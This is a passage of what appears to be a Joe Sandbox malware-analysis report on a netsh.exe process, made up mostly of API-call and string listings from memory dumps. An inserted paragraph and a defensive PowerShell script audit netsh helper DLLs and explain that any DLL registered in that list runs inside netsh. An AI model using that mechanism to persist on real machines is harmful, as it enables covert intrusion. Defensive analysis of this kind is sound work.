              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,01564CB5,?,00000002,?,?,?), ref: 01568403
              • PrintMessage.NETSH(%1!-14s! - ,01573FEC,00000001,?,?,?,?,?,01564CB5,?,00000002,?,?,?), ref: 01568412
              • PrintMessageFromModule.NETSH(?,?,?,?,0156131C,00000001,?,?,?,?,?,01564CB5,?,00000002,?,?), ref: 01568436
              • PrintMessage.NETSH(01561320,?,?,?,?,00000001,?,?,?,?,?,01564CB5,?,00000002,?,?), ref: 01568447
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: MessagePrint$Heap$Process$AllocFreeFromModuleqsort
              • String ID: %1!-14s! -
              • API String ID: 3292501186-4170063814
              • Opcode ID: 6b6de4a4faa89b83bc0b2e6e291649565d8ce45c1c4dd6c24b2b9108105bf486
              • Instruction ID: 635442ad4abc6d3ce3b8efca7bc71284499a6fd9f828659925981a67c335ddc7
              • Opcode Fuzzy Hash: 6b6de4a4faa89b83bc0b2e6e291649565d8ce45c1c4dd6c24b2b9108105bf486
              • Instruction Fuzzy Hash: 7B312C75700302EFDB21AFA9DC96C7EB7ADFB84228310842DE9464F204D6719C49DBE0
              APIs
              • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48,?,01567F23), ref: 01567C05
              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000500,?,00000000,00000000,?,00000000,?,?,015679C1,00000000,00000000,?,01567E48,?,01567F23), ref: 01567C2C
              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567C53
              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567C3A
                • Part of subcall function 01567920: GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,000000B6,000000FF,00000000,00000000,00000000,00000000,0156471D,00000000,00004000,00000000,00000000,?,01567E48,?,01567F23), ref: 01567939
                • Part of subcall function 01567920: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567940
                • Part of subcall function 01567920: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 0156794A
                • Part of subcall function 01567920: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567951
                • Part of subcall function 01567920: GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,000000B6,000000FF,00000000,00000000,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567969
                • Part of subcall function 01567920: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567970
                • Part of subcall function 01567920: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(000000B6,00000000,-00000001,0156471D,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567981
                • Part of subcall function 01567920: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,-00000001,0156471D,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567998
                • Part of subcall function 01567920: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679A8
                • Part of subcall function 01567920: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679B4
                • Part of subcall function 01567920: PrintError.NETSH(00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679BC
                • Part of subcall function 01567920: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679C5
                • Part of subcall function 01567920: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679CC
              • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(000003EE,?,00004000,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D), ref: 01567C8C
              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567C98
              • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,00004000,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D), ref: 01567CE5
              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000500,?,00000000,00000000,?,00000000,?,?,015679C1,00000000,00000000,?,01567E48,?,01567F23), ref: 01567D0C
              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567D5F
              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,01561714,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567D79
              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001000,00000000,?,00000400,?,00004000,?,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48), ref: 01567DC3
              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567DD1
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Handle$Heap$FormatFreeLoadMessageString$ByteCharConsoleErrorFileLocalMultiOutputProcessWideWrite$AllocCloseLastPrint
              • String ID:
              • API String ID: 1170536616-0
              • Opcode ID: bc8bf3f37e878e743a6f7a4d076fbfb0135440f3c3e5130d020d2207c851298d
              • Instruction ID: 1147d0e4e61488f76ec1e1964bc5d6e3d120b91e4c43f352463ced3436aa9339
              • Opcode Fuzzy Hash: bc8bf3f37e878e743a6f7a4d076fbfb0135440f3c3e5130d020d2207c851298d
              • Instruction Fuzzy Hash: 0151A33560011A9BEB319B54DC44EEE77BCFB48714F0085A4E95ADB284DB309E8CCFA0
              APIs
                • Part of subcall function 015689D7: lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,015648DC), ref: 015689EE
                • Part of subcall function 01568A48: lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,01561A54,?,?,?), ref: 01568A94
                • Part of subcall function 01568A48: memcmp.MSVCRT ref: 01568AA4
                • Part of subcall function 01568A48: lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,ras,?,?), ref: 01568AD8
                • Part of subcall function 01568A48: MatchToken.NETSH(?,diagnostics,?,?), ref: 01568B1C
                • Part of subcall function 01568A48: MatchToken.NETSH(?,set,?,diagnostics,?,?), ref: 01568B31
                • Part of subcall function 01568A48: MatchToken.NETSH(?,show,?,set,?,diagnostics,?,?), ref: 01568B42
                • Part of subcall function 01568A48: MatchToken.NETSH(?,tracing,?,set,?,diagnostics,?,?), ref: 01568B54
                • Part of subcall function 01568A48: MatchToken.NETSH(?,user,?,tracing,?,set,?,diagnostics,?,?), ref: 01568B66
                • Part of subcall function 01568A48: MatchToken.NETSH(?,add,?,user,?,tracing,?,set,?,diagnostics,?,?), ref: 01568B77
                • Part of subcall function 01568A48: MatchToken.NETSH(?,delete,?,add,?,user,?,tracing,?,set,?,diagnostics,?,?), ref: 01568B88
                • Part of subcall function 01568A48: MatchToken.NETSH(?,dump,?,delete,?,add,?,user,?,tracing,?,set,?,diagnostics,?,?), ref: 01568B99
              • PrintError.NETSH(00000000,00000000), ref: 0156492B
                • Part of subcall function 01568BE5: RegGetValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,System\CurrentControlSet\Services\RemoteAccess\Parameters,MultiTenancyEnabled,00000018,00000000,00000000,00000004), ref: 01568C30
                • Part of subcall function 01568BE5: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000), ref: 01568C52
              • MatchToken.NETSH(?,01561490,?), ref: 0156497C
              • MatchToken.NETSH(?,00000000,?), ref: 015649D3
              • MatchToken.NETSH(?,?,?), ref: 01564A32
              • MatchToken.NETSH(?,?,?), ref: 01564A72
                • Part of subcall function 015651C6: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,00000000,?,?,?,?,01564B22,?,?,?,?,?), ref: 0156525B
                • Part of subcall function 015651C6: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01564B22,?,?,?,?,?), ref: 01565262
                • Part of subcall function 015651C6: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,?,?,?,01564B22,?,?,?,?,?), ref: 01565286
                • Part of subcall function 015651C6: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01564B22,?,?,?,?,?), ref: 0156528D
              • GenericMonitor.NETSH(?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 01564BB9
                • Part of subcall function 015648A0: MatchToken.NETSH(?,help,?,?,?), ref: 01564BDC
                • Part of subcall function 015648A0: MatchToken.NETSH(?,015612B0,?,help,?,?,?), ref: 01564BF1
                • Part of subcall function 015648A0: MatchCmdLine.NETSH(?,-000000FB,?,?,?,015612B0,?,help,?,?,?), ref: 01564C3E
                • Part of subcall function 0156846A: PrintMessageFromModule.NETSH(00000087,00000000,?,?,?,01564CB5,?,00000002,?,?,?,?), ref: 0156850E
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Match$Token$Heap$lstrcmpi$PrintProcess$AllocCloseErrorFreeFromGenericLineMessageModuleMonitorValuememcmp
              • String ID: help
              • API String ID: 1271217041-143088812
              • Opcode ID: 31e8722618eb1ea799304b1d178e30703b9602a33fe8195e811bdb1b67f8fc67
              • Instruction ID: f393dc22db1234b664ad5f37d853cd251fbfe56e742f9a068d4609c3fcc0dd38
              • Opcode Fuzzy Hash: 31e8722618eb1ea799304b1d178e30703b9602a33fe8195e811bdb1b67f8fc67
              • Instruction Fuzzy Hash: 55D14870A0020AEFDF15DF69C9809AEBBBAFF88314B048159E9159F256D731ED61CBD0
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: ___swprintf_l
              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
              • API String ID: 48624451-2108815105
              • Opcode ID: 9a0717efed1b2de52c322555a2aa8719446ea5ef4b6ce8f924ce7c3448cf1925
              • Instruction ID: 3058465020d5c9f6d7050c20bfc9809e3eb6f683efe2b045b828bba985638d57
              • Opcode Fuzzy Hash: 9a0717efed1b2de52c322555a2aa8719446ea5ef4b6ce8f924ce7c3448cf1925
              • Instruction Fuzzy Hash: F251D7B6A0011ABFCF10DB9C8890A7EFBB8FB18304B14C269E4A5D7641D274DE548BF0
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: ___swprintf_l
              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
              • API String ID: 48624451-2108815105
              • Opcode ID: b24d21488773fec695c46f4fcaebe9abed848bb1c5fb2ec14fadf60563edd906
              • Instruction ID: e89c8d79301e1b5ff45effad4413cb0249cd34fb73a5a0ed80e3f5c23a183180
              • Opcode Fuzzy Hash: b24d21488773fec695c46f4fcaebe9abed848bb1c5fb2ec14fadf60563edd906
              • Instruction Fuzzy Hash: EF51E571A00645AFCB30DE5CCC9497EBBF9EB44304B14945EE6A6E76C1E674DE808B60
              APIs
                • Part of subcall function 01565EB0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000000C,?,00000000,?,?,?,?,015651DC,?,?,?,01564B22,?,?,?), ref: 01565D5D
                • Part of subcall function 01565EB0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,015651DC,?,?,?,01564B22,?,?,?,?,?), ref: 01565D64
                • Part of subcall function 01565EB0: PrintMessageFromModule.NETSH(00000068,?,?,015651DC,?,?,?,01564B22,?,?,?,?,?), ref: 01565E91
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 0156300B
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563012
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 01563032
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563039
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01563058
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156305F
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156307B
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563082
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 01563091
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563098
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$Free$AllocFromMessageModulePrint
              • String ID: netsh
              • API String ID: 695201130-4166728403
              • Opcode ID: 80d6d34339476df12b7e0a5e562097435b01e3b671a317ba98a11710beec5aa4
              • Instruction ID: 93fa9b1ba3eefd678991a8a6d83b8bce2f4749f1c23a9d698f8de0fc332ba677
              • Opcode Fuzzy Hash: 80d6d34339476df12b7e0a5e562097435b01e3b671a317ba98a11710beec5aa4
              • Instruction Fuzzy Hash: D1217F71620202EFDB229FA9E44DB59BBADFF44735F118419E51D8F246DB709848CBA0
              APIs
              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 01568153
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Handle
              • String ID: NetshStopRefreshEvent
              • API String ID: 2519475695-639338441
              • Opcode ID: 9f8b9daf2ccf6649f3b3b088b6f914939a072ef117aac5444523111c53a045c3
              • Instruction ID: bed65acae4150aac3c536ac3c0bfb1856ea31bf6a423867b0ba1034906d670b1
              • Opcode Fuzzy Hash: 9f8b9daf2ccf6649f3b3b088b6f914939a072ef117aac5444523111c53a045c3
              • Instruction Fuzzy Hash: 7B311A71910215EFDB129FA4DC45BAEBBB8FF09726F110515F922EF280D77498448BA4
              Strings
              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00DC46FC
              • CLIENT(ntdll): Processing section info %ws..., xrefs: 00DC4787
              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00DC4725
              • ExecuteOptions, xrefs: 00DC46A0
              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00DC4742
              • Execute=1, xrefs: 00DC4713
              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00DC4655
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID:
              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
              • API String ID: 0-484625025
              • Opcode ID: be35b27694306c83800a43eed78a6b3246d74321b546f3c3328b5a9dab57f7c6
              • Instruction ID: 90dae9b0aa987692ce78572b03781318574b96e00a9fa8f9a3a83b9796bcb6c5
              • Opcode Fuzzy Hash: be35b27694306c83800a43eed78a6b3246d74321b546f3c3328b5a9dab57f7c6
              • Instruction Fuzzy Hash: 305117356442197ADF10BBA5DC96FAE77A8EF45300F2800A9E505A72D1EB70DE45CF70
              APIs
              • PrintMessageFromModule.NETSH(000000CB), ref: 01564257
                • Part of subcall function 01567EA0: LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,?,00000000,?,?,0156471D,000000B6,?), ref: 01567ED0
                • Part of subcall function 01567EA0: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,GetResourceString,?,0156471D,000000B6,?), ref: 01567EE2
                • Part of subcall function 0156412C: ConvertGuidToString.NETSH(?,?), ref: 0156417C
                • Part of subcall function 0156412C: PrintMessageFromModule.NETSH(000000C8,?,?), ref: 0156419F
                • Part of subcall function 0156412C: PrintMessageFromModule.NETSH(000000C9), ref: 015641B6
                • Part of subcall function 0156412C: PrintMessageFromModule.NETSH(000000CA,?), ref: 015641D3
              • PrintMessageFromModule.NETSH(000000CC), ref: 01564296
              • PrintMessage.NETSH(%1!s!,00000000), ref: 015642AB
              • ConvertGuidToString.NETSH(?,?), ref: 015642ED
              • ConvertGuidToString.NETSH(?,?), ref: 01564301
              • PrintMessageFromModule.NETSH(000000CD), ref: 01564315
              • PrintMessageFromModule.NETSH(000000CE,?,?,?), ref: 01564345
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: MessagePrint$FromModule$String$ConvertGuid$AddressLoadProc
              • String ID: %1!s!
              • API String ID: 953968408-1485915839
              • Opcode ID: 3b758d465ce51508492d98335d5e63c755bbaac096796d36201f3c35063ae256
              • Instruction ID: 07841f98cd2b9a809094c0b27b2f8772e0b224b2cf89d4cd21912028d6f10917
              • Opcode Fuzzy Hash: 3b758d465ce51508492d98335d5e63c755bbaac096796d36201f3c35063ae256
              • Instruction Fuzzy Hash: 7531E9717002069FEB34DB68EC85F6A77EDFB94218F520129D5198F184DB30AD49DB90
              APIs
              • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000000), ref: 01563896
              • PrintMessageFromModule.NETSH(0000006A,?,?,00000000,00000000), ref: 015638B2
              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,InitHelperDll,?,00000000,00000000), ref: 015638CA
              • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,00000000), ref: 015638FB
              • PrintMessageFromModule.NETSH(?,000003ED,InitHelperDll,?,?,00000000,00000000), ref: 015638F2
                • Part of subcall function 01567EA0: LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,?,00000000,?,?,0156471D,000000B6,?), ref: 01567ED0
                • Part of subcall function 01567EA0: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,GetResourceString,?,0156471D,000000B6,?), ref: 01567EE2
              • PrintMessageFromModule.NETSH(00000088,InitHelperDll,?,00000000,?,00000000,00000000), ref: 01563960
                • Part of subcall function 01563CED: _wcsicmp.MSVCRT ref: 01563D15
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: FromMessageModulePrint$AddressLibraryLoadProc$FreeString_wcsicmp
              • String ID: InitHelperDll$InitHelperDll
              • API String ID: 4046571770-3952794692
              • Opcode ID: 85be18c9941ade2e0ac2335e714ce940d61426badd23f1c41294d40080d13c3b
              • Instruction ID: 61c4da552f77021e89d8dcdffb800c0765bf9cc81b80756b25f1e4d4ccc571db
              • Opcode Fuzzy Hash: 85be18c9941ade2e0ac2335e714ce940d61426badd23f1c41294d40080d13c3b
              • Instruction Fuzzy Hash: 5131F871B10701AFD7729F58EC86E3677A9FB84314B420828E81A9F295DB70AC09DB91
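              The LoadLibraryExW / GetProcAddress("InitHelperDll") sequence in the function above is netsh.exe's own helper-DLL loader: on startup netsh reads the helper list under HKLM\SOFTWARE\Microsoft\NetSh, loads each DLL and calls its InitHelperDll export, so any DLL registered there runs inside every netsh process. When reviewing a netsh.exe process that the report shows hosting injected code, a responder will also want to confirm that this helper list has not been tampered with. The following PowerShell check is an added example, not code from the Joe Sandbox report or from netsh; the registry location is netsh's documented helper list, while the path resolution (bare file names assumed to live in System32, everything elsewhere treated as suspect) is a simplification of LoadLibraryExW's search order and is an assumption of this script.

```powershell
# Added example (not from the Joe Sandbox report): enumerate the helper DLLs
# that netsh.exe loads via LoadLibraryExW + GetProcAddress("InitHelperDll")
# and report their Authenticode state. HKLM\SOFTWARE\Microsoft\NetSh is the
# helper list netsh uses; resolving bare names to System32 is an assumption.
$helperKey = 'HKLM:\SOFTWARE\Microsoft\NetSh'
$system32  = Join-Path $env:SystemRoot 'System32'

$props = Get-ItemProperty -Path $helperKey

$props.PSObject.Properties |
    Where-Object { $_.Name -notlike 'PS*' } |        # drop PSPath/PSDrive/... noise
    ForEach-Object {
        $name = $_.Name
        $dll  = [string]$_.Value

        # netsh passes the value to LoadLibraryExW; a bare name goes through the
        # normal DLL search order. For the check we assume System32 and treat any
        # rooted path outside System32 as suspect.
        $path = if ([IO.Path]::IsPathRooted($dll)) { $dll } else { Join-Path $system32 $dll }
        $exists = Test-Path -LiteralPath $path
        $sig = if ($exists) { Get-AuthenticodeSignature -FilePath $path } else { $null }

        $outsideSystem32 = -not $path.StartsWith($system32, [StringComparison]::OrdinalIgnoreCase)
        $badSignature    = ($null -ne $sig) -and ($sig.Status -ne 'Valid')

        [pscustomobject]@{
            Helper  = $name
            Dll     = $dll
            Path    = $path
            Exists  = $exists
            Status  = if ($sig) { $sig.Status } else { 'Missing' }
            Signer  = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
            Suspect = $outsideSystem32 -or (-not $exists) -or $badSignature
        }
    } |
    Sort-Object Suspect -Descending |
    Format-Table -AutoSize
```

              Inbox helpers such as ifmon.dll or fwcfg.dll are catalog-signed and report Valid with a Microsoft signer; a helper that is unsigned, signed by someone else, missing, or resolved outside System32 is the entry to pull for further analysis. Run the script elevated if the key cannot be read.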
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000000C,00000000,?,?,?,?,?,?,0156603A,00000000,?,?,?,?,?), ref: 01565057
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,0156603A,00000000,?,?,?,?,?,?,?), ref: 0156505E
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$AllocProcess
              • String ID:
              • API String ID: 1617791916-0
              • Opcode ID: b2028bb97b98e802968641b356625fa3035e90cea625a3a142f8492e768dc1b7
              • Instruction ID: 93424b3dfcd1e972896f04db904cdd8cc053631dfc12177d0f3d6e0883f45932
              • Opcode Fuzzy Hash: b2028bb97b98e802968641b356625fa3035e90cea625a3a142f8492e768dc1b7
              • Instruction Fuzzy Hash: 34712575A60212DBDB249F6CD8546BEB7E9FF446A4B444429EA85DF380FA31C842C7E0
              APIs
              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,00000000,00000000,?), ref: 015676EF
              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 015676F6
              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?), ref: 01567711
              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 01567718
              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,00000001,?,00000000), ref: 0156772C
              • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 01567733
              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?), ref: 0156778E
              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 01567795
              • fputwc.MSVCRT ref: 015677AA
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: ConsoleHandle$Mode$Readfputwc
              • String ID:
              • API String ID: 2610215220-0
              • Opcode ID: cdcb9e9e08b727d5ee85f4fb0b149455e7d709a587ef9f63dda13b7880066d2c
